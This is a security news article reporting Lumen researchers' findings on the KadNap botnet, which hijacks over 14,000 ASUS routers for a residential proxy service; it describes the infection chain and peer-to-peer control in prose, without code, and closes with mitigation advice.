KadNap Botnet Hijacks 14,000+ ASUS Routers for Proxy Network

A botnet called KadNap has compromised over 14,000 ASUS routers and edge networking devices since August 2025, turning them into a proxy network that cybercriminals rent for DDoS attacks, credential stuffing, and traffic obfuscation. Lumen Technologies researchers tracked the operation and have begun blocking all traffic to the botnet's control infrastructure.

How KadNap Infects Routers

The infection begins with a shell script named "aic.sh" downloaded from the command server. This script creates a cron job that runs every 55 minutes, retrieving updates and maintaining persistence across router reboots. The script renames itself to ".asusrouter"—a hidden file that blends with legitimate ASUS configuration files.

Once persistence is established, the script downloads an ELF binary named "kad" that installs the botnet client. The malware targets devices running both ARM and MIPS processors, covering the majority of consumer and small business networking equipment.

After installation, KadNap determines the host's external IP address and contacts NTP servers to synchronize timing data. This timing coordination suggests the botnet operators need precise scheduling across their proxy network, likely for coordinated attacks or to avoid detection through behavioral analysis.

Kademlia DHT: Hiding in Plain Sight

KadNap's most notable feature is its use of a custom Kademlia Distributed Hash Table protocol for command and control. Rather than pointing infected devices at a single server that defenders could block, the malware distributes C2 information across a peer-to-peer network.

This makes traditional domain or IP-based blocking largely ineffective. Infected routers discover new C2 nodes through the DHT, and the infrastructure can shift without pushing updates to every bot. We've seen similar P2P C2 techniques used by North Korean actors targeting FortiGate devices, suggesting the approach is gaining popularity among sophisticated threat actors.

However, Lumen researchers found a weakness: KadNap consistently connects to two specific nodes before reaching the actual C2 infrastructure. This architectural shortcut reduces the decentralization benefits and gives defenders a chokepoint for detection and blocking.

The Doppelganger Connection

The KadNap botnet feeds into the Doppelganger proxy service, believed to be a rebrand of the defunct Faceless service previously linked to the TheMoon malware operation. Doppelganger sells access to infected devices as "residential proxies"—IP addresses that appear to originate from legitimate home internet connections rather than known data centers or VPN providers.

These residential proxies command premium prices because they:

• Evade IP-based blocking and rate limiting
• Bypass geographic restrictions
• Obscure the true source of attacks
• Make credential stuffing and account takeover more effective

Cybercriminals using Doppelganger can route their traffic through thousands of compromised home routers, making attribution and blocking extremely difficult for target organizations.

Geographic Distribution

The infection pattern isn't random. Sixty percent of compromised devices are located in the United States, with significant clusters in Taiwan, Hong Kong, and Russia. The US concentration likely reflects both the popularity of ASUS routers in the American market and the premium value of US-based residential IP addresses for bypassing American services.

This geographic targeting echoes patterns we've covered in threat intelligence reports showing US credentials and access selling at higher prices on dark web marketplaces. American IP addresses simply open more doors.

Why This Matters

Router botnets represent a persistent blind spot in enterprise security. Organizations focus on endpoint detection, email filtering, and network segmentation while traffic from employee home routers—now often part of corporate network paths thanks to remote work—goes largely unmonitored.

A compromised home router can:

• Intercept unencrypted traffic
• Redirect DNS queries
• Serve as a pivot point into corporate VPNs
• Generate malicious traffic that appears to originate from legitimate employees

The 14,000+ device count makes KadNap mid-sized by botnet standards, but the residential proxy angle amplifies its impact. Each infected router potentially facilitates hundreds of attacks against other organizations.

Mitigation Steps

Lumen Technologies is blocking KadNap traffic across their network and plans to publish indicators of compromise publicly. For ASUS router owners:

1. Update firmware immediately - Check the ASUS support site for your model
2. Disable remote management - Unless absolutely necessary for your use case
3. Check for unusual cron jobs - Look for hidden files in system directories
4. Monitor outbound traffic - Unexpected connections to non-standard ports may indicate compromise
5. Consider router replacement - Older models no longer receiving updates should be retired

Enterprise security teams should assume some percentage of remote workers have compromised home network equipment. Zero trust architectures that don't implicitly trust traffic based on source IP become more important as router botnets proliferate.